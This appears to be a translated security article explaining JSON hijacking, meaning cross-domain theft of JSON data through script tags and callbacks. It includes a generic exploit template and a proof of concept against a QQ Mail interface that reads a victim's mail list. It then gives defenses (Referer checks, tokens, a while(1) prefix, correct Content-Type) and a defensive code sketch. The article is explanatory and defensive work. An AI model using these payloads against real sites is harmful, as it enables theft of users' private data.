JSON hijacking / JSON hijacking vulnerability

Source: Internet
Author: User
Tags: qmail

0x00 Background
JSON (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write, and easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition, December 1999. JSON is a completely language-independent text format, but it uses conventions familiar to programmers of the C family of languages (C, C++, C#, Java, JavaScript, Perl, Python, and so on). These properties make JSON an ideal data-interchange language.
Because this text-only exchange format can be consumed directly in the browser, the rise of Ajax and web services has seen it widely adopted by large websites, including Yahoo, Google, Tencent, Baidu and others.
However, if this mechanism is used to transmit sensitive data without adequate security controls on the transmission, the result is a security vulnerability; depending on what sensitive information is exposed, the application can be attacked to differing degrees.
0x01 Cause
JSON is a practical application of JavaScript. When it is used as a data transmission method, the effect of the browser's JavaScript cross-domain security policy must be considered. Take, for example, the following data:
$data = array("username" => "wooyun",
              "password" => "wooyun"
);
There are two ways of transmitting this data in real JSON applications:
Xmlhttp:
{"username": "wooyun", "password": "wooyun"}
When the front end fetches this data, the consumer and the provider of the data belong to the same domain (for example www.wooyun.org) and therefore to the same trusted security region. The data can be obtained with xmlhttp and then handed to the application's own JavaScript logic, for example via eval (other methods are possible too). In this way the data only ever travels within a trusted domain and, in current browsers, does not leak to untrusted third parties.
Script data acquisition method:
userinfo = {"username": "wooyun", "password": "wooyun"}
When the transmitted data crosses two different domains, as when a large Internet company's application A on domain A wants data from application B on domain B, JavaScript cannot fetch data across domains, so a script tag is generally used to load the data and a callback is used to obtain the final result. For example:
<script src="http://www.wooyun.org/userdata.php?callback=userinfo"></script>
Because the data is transmitted between two completely different domains, a lack of effective control may leak it to third-party programs.
0x02 Attack methods and hazards
By analyzing the data interactions in an application, sensitive information leaks can often be found. The usual method is to capture the application's interactions and look for sensitive data; where the transmission has no security control, such a vulnerability has been found.
The main danger is that, for data-sensitive applications, this can lead to serious attacks. For applications that are not data-sensitive, or that even publish their data to third parties, such issues are generally not considered security problems. Using JavaScript hijacking from a third-party domain, sensitive data can be stolen. The general form of the exploit code is as follows:
<script>
// the callback receives the JSON object the interface wraps in callback(...)
function wooyun_callback(data) {
    alert(data);
}
</script>
<script src="http://www.wooyun.org/userdata.php?callback=wooyun_callback"></script>
0x03 Actual Case
By constructing a URL and getting a user to open it, the user's QQ Mail list can be obtained. The background is that sharing mail information from QQ Mail into Web QQ required QQ Mail to expose a JSON interface from which a third-party domain could fetch QQ Mail information; however, this interface lacked sufficient authentication, so any third-party domain could obtain the mail list with a script tag.
<script>
var Qmail = {};
</script>
<script src="http://mail.qq.com/cgi-bin/login?fun=passport&target=MLIST&t=login.js&pagesize=10&resp_charset=gb2312&1=3"></script>
<script>
alert(Qmail.newMailsList.nextUrl);
alert(document.scripts[1].src = Qmail.newMailsList.nextUrl);
alert(Qmail.newMailsList.summary);
</script>
0x04 Solution
Avoid cross-origin data transmission as far as possible. For data transmission within the same domain, use xmlhttp as the data acquisition method and rely on the browser's JavaScript same-domain security to protect the data. For cross-origin data transmission, access to sensitive data must be authenticated. Specific methods include:
1. Referer source restriction: rely on the fact that the front-end Referer cannot be forged by page script to ensure that the request for data comes from a trusted place. This method is relatively weak because it depends entirely on the Referer, and in some situations (such as XSS) it may be bypassed.
2. Adding a token: strictly speaking, obtaining data by JavaScript hijacking is a type of CSRF. But whereas traditional CSRF can only submit data and cannot read it, this method uses JavaScript to read sensitive information. If the interface can be made unpredictable to the attacker, JSON hijacking is prevented; this is done by using a token to authenticate the identity of the caller. It demands finer attention to the caller's identity, and in the event of XSS the front-end token may leak, rendering the protection ineffective.
3. When using JSON within the same domain, prefix the output with while(1) so that the data cannot be consumed via a script tag; this prevents data leakage in some browsers with peculiar behaviour.
0x05 Other security questions
1. Correct HTTP header output for JSON responses.
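As an added example (not code from the original article), the following JavaScript sketches a framework-independent server-side handler that combines the three defenses of 0x04 with the correct Content-Type from 0x05, together with the same-origin xmlhttp consumer that strips the while(1) prefix; the request and session object shapes, the trusted-origin list and the X-CSRF-Token header name are assumptions for illustration.

```javascript
// Added example, not from the original article: the three 0x04 defenses
// plus the 0x05 header point, as a framework-independent handler.
// The request/session shapes and header names are assumptions.
const TRUSTED_ORIGINS = ["https://www.wooyun.org"]; // assumed allowed callers
const PREFIX = "while(1);"; // as a <script> include the body just hangs here

// Defense 1: Referer restriction. Compares only the origin; a missing or
// unparsable Referer is rejected. Weak alone (XSS can bypass it).
function refererAllowed(referer) {
  if (typeof referer !== "string") return false;
  try {
    return TRUSTED_ORIGINS.includes(new URL(referer).origin);
  } catch (e) {
    return false;
  }
}

// Defense 2: per-session token echoed back in a custom header. A plain
// <script src> from another domain cannot set headers, so it always fails.
// (A constant-time comparison is preferable in production code.)
function tokenValid(req, session) {
  const sent = req.headers["x-csrf-token"];
  return typeof sent === "string" && sent.length > 0 && sent === session.csrfToken;
}

// Defense 3 and 0x05: prefix the JSON so a <script> include cannot use it,
// and label the response as JSON rather than JavaScript.
function handleUserData(req, session) {
  const headers = { "Content-Type": "application/json" };
  if (!refererAllowed(req.headers["referer"]) || !tokenValid(req, session)) {
    return { status: 403, headers, body: "{}" };
  }
  const body = PREFIX + JSON.stringify({ username: session.username });
  return { status: 200, headers, body };
}

// Same-origin consumer: xmlhttp reads the raw text, strips the prefix and
// parses it with JSON.parse instead of eval.
function parseProtectedJson(body) {
  if (!body.startsWith(PREFIX)) throw new Error("unexpected response framing");
  return JSON.parse(body.slice(PREFIX.length));
}

// Constructed sample inputs.
const session = { username: "wooyun", csrfToken: "tok-123" };
const sameOriginReq = { headers: { referer: "https://www.wooyun.org/app", "x-csrf-token": "tok-123" } };
const scriptTagReq = { headers: { referer: "https://third-party.example/" } };
```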
0x06 Related Resources
http://www.json.org/json-zh.html
 
